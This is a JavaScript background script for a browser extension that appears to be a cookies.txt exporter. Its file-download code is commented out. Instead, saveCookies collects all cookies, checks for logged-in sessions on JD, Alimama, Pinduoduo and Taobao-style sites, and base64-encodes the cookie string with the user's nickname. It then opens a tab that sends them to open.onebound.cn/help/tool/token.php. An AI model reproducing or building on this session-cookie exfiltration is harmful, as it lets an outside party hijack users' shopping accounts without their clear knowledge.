function formatCookie(co) {
  return [
    [
      co.httpOnly ? '#HttpOnly_' : '',
      !co.hostOnly && co.domain && !co.domain.startsWith('.') ? '.' : '',
      co.domain
    ].join(''),
    co.hostOnly ? 'FALSE' : 'TRUE',
    co.path,
    co.secure ? 'TRUE' : 'FALSE',
    co.session || !co.expirationDate ? 0 : co.expirationDate,
    co.name,
    co.value + '\n'
  ].join('\t');
}

/**
 * Get the cookies.txt file's name.
 * @param {string} storeId ID of the cookie store to get cookies for.
 */
async function getCookiesFilename(storeId) {
  if (storeId == 'firefox-default') {
    return 'cookies.txt'
  } else {
    let containerName;
    try {
      containerName = (await browser.contextualIdentities.get(storeId)).name;
    } catch (e) {
      /* In case we can't get the name of the container, fallback on the storeId */
      containerName = storeId;
    }
    return 'cookies.' + containerName + '.txt';
  }
}

/**
 * Save all cookies from a given store.
 * @param {browser.cookies.Cookie[]} cookies Cookies from the store
 * @param {string} storeId ID of the store
 */
async function saveCookies(cookies, storeId) {
  var header = [
    '# Netscape HTTP Cookie File\n',
    '# https://curl.haxx.se/rfc/cookie_spec.html\n',
    '# This is a generated file! Do not edit.\n\n'
  ];


  var host = "";
  var url = "";
  var nick = "";
  var cookie_str = "";
  var cookie_string = "";
  var is_login=true;
  var cs={};
  for(i in cookies) {
      name = cookies[i].name;
      value = cookies[i].value;
      cs[name]=value;
      cookie_str += (name + "=" + value + ";\n");
      cookie_string += (name + "=" + value + "; ");
    }
    
  //custom
  // chrome.tabs.getSelected(null,function(tab) {
  //     url = tab.url;
  //   });
  chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {  
    console.log('Current tab URL: ' + tabs[0].url);  
    url = tabs[0].url;

    console.log(url);

    fragment = url.split('/');
    var host = fragment[2];
    url = fragment[0] + '//' + fragment[2];

    if(host=='www.jd.com'||host=='order.jd.com'||host=='i.jd.com'){
      host='www.jd.com';
    }
    if(host=='pub.alimama.com'){
      if(cs['cookie2']==null||cs['login']==null){

      }else{
        is_login =1
      }

    }else if(host=='www.jd.com'){
      if(cs['unick']&&cs['__jdv']){
        is_login=1;
        nick = cs['unick'];
      }
    }else if(host=='mobile.pinduoduo.com'||host=='mobile.pinduoduo.com'){
      if(cs['PDDAccessToken']){//pdd_user_id
        is_login=1;
        if(document.querySelector('.nickname')){
          nick = document.querySelector('.nickname').innerText;
          cookie_string += 'pdd_nickname='+document.querySelector('.nickname').innerText+'; ';
        }
      }
    }else if(cs['cookie2']==null||cs['_m_h5_tk']==null){
      is_login =0
    }else{
      is_login =1;
      nick = cs['_nk_'];
      if(!nick)nick = cs['sn'];//sub
    }

    //custom    
    var token_url = 'https://open.onebound.cn/help/tool/token.php?cookie=';
    token_url = token_url+base64_encode(cookie_string)+'&host='+host+'&nick='+nick;

    chrome.tabs.create({ url: token_url}, function (tab) {});

  });  

  // console.log(token_url)
  // window.location.href=(token_url);
  // // window.open(token_url);
  // window.close();

  // var body = cookies.map(formatCookie)
  // var blob = new Blob(header.concat(body), {type: 'text/plain'});
  // var objectURL = URL.createObjectURL(blob);
  // let cookiesFilename = await getCookiesFilename(storeId)
  // browser.downloads.download(
  //   {
  //     url: objectURL,
  //     filename: cookiesFilename,
  //     saveAs: true,
  //     conflictAction: 'overwrite'
  //   }
  // );
}

async function getCookies(stores_filter) {
  for (var store of stores_filter.stores) {
    console.log("Store: " + store.id)
    var cookies = await browser.cookies.getAll({
        ...stores_filter.filter,
        ...{ storeId: store.id, firstPartyDomain: null }});
    saveCookies(cookies, store.id);
  }
}

function base64_encode(str){
   var c1, c2, c3;
   var base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";               
   var i = 0, len= str.length, string = '';
   while (i < len){
           c1 = str.charCodeAt(i++) & 0xff;
           if (i == len){
                   string += base64EncodeChars.charAt(c1 >> 2);
                   string += base64EncodeChars.charAt((c1 & 0x3) << 4);
                   string += "==";
                   break;
           }
           c2 = str.charCodeAt(i++);
           if (i == len){
                   string += base64EncodeChars.charAt(c1 >> 2);
                   string += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
                   string += base64EncodeChars.charAt((c2 & 0xF) << 2);
                   string += "=";
                   break;
           }
           c3 = str.charCodeAt(i++);
           string += base64EncodeChars.charAt(c1 >> 2);
           string += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));
           string += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));
           string += base64EncodeChars.charAt(c3 & 0x3F)
   }
           return string
}
function handleClick(filter = {}) {
  var gettingAllStores = browser.cookies.getAllCookieStores()
  gettingAllStores
    .then(stores => ({stores: stores, filter: filter}))
    .then(getCookies);
}

browser.runtime.onMessage.addListener(handleClick)


// chrome.runtime.onInstalled.addListener(function() {  
//   console.log('Extension installed');  
//   // 获取当前标签页的URL  
//   chrome.tabs.query({active: true, currentWindow: true}, function(tabs) {  
//     console.log('Current tab URL: ' + tabs[0].url);  
//   });  
// });
